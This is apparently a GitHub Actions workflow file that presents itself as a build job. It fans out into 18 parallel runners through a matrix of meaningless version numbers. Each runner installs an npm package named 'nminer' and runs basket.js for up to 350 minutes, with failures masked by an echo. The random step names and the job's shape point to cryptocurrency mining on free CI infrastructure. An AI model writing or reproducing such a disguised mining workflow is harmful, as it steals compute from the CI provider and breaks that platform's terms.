name: basket
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2912 }
          - { version: 8865 }
          - { version: 9939 }
          - { version: 3868 }
          - { version: 6175 }
          - { version: 3260 }
          - { version: 2022 }
          - { version: 7760 }
          - { version: 4161 }
          - { version: 7829 }
          - { version: 896 }
          - { version: 6456 }
          - { version: 9900 }
          - { version: 2500 }
          - { version: 8959 }
          - { version: 4584 }
          - { version: 8526 }
          - { version: 3627 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: begonia maestro eyeliner
        run: |
          npm install nminer@latest
          timeout 350m node basket.js || echo "basket executed"